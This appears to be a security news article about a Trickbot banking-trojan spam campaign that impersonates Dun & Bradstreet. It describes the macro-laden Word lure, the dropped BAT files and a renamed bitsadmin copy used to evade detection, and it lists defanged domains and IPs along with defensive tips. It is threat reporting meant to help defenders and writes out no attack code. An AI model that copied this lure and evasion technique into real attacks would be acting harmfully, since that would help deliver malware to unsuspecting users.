- The spam emails tried to mimic Dun & Bradstreet’s official site by having a lookalike, fake domain.
- These emails contained macros that drop malicious BAT files to initiate the download for Trickbot’s payload.
Trickbot, one of the persistent banking trojans these days, has been spotted with another spam campaign. This time the attackers have impersonated the prominent business analytics company, Dun & Bradstreet.
Spam emails touted as ‘complaint’ are found containing malicious macros that deliver Trickbot. It is reported that this Trickbot campaign was directed at people in the US.
The big picture
- Spams have the subject line “FW: Company Complaint #DNBC920201TF” and come from a false domain “service@dnscomplaint[.]com”.
- They contain a Word document attachment named ‘DNBC920201TF.doc’ which in turn, has malicious macros.
- The macros are initiated once the attachment is opened. A number of BAT files are dropped into the system which has instructions to download and install Trickbot.
- Then the bitsadmin.exe, a process used to manage jobs in the command center is copied by the macro and is renamed as ld0CIC0.exe. The reason for performing this step is to evade detection by security software.
- ld0CIC0.exe downloads an EXE file as well as binary files, which are combined to form the Trickbot malware.
Domains registered in GoDaddy - This latest campaign’s emails were also observed to have multiple domains registered on GoDaddy.
“Today’s example of the spoofed domain is, as usual, registered via Godaddy as registrar. Because of new GDPR rules, we cannot easily find the registrants name or any further details. dnbcomplaint.com hosted on & sending emails via 95.211.143[.]199 | 185.203.33[.]172 | 95.211.197[.]182 | 85.17.76[.]82,” myonlinesecurity.co.uk reported.
What can be done to prevent the infection?
Users are advised to disable macros from automatically opening in the Word doc. Newer versions of Microsoft Word usually have macros disabled by default.
Furthermore, any Word file received through emails should be opened in “protected view” which terminates malicious activities such as malware or DDE exploits, from running in the system.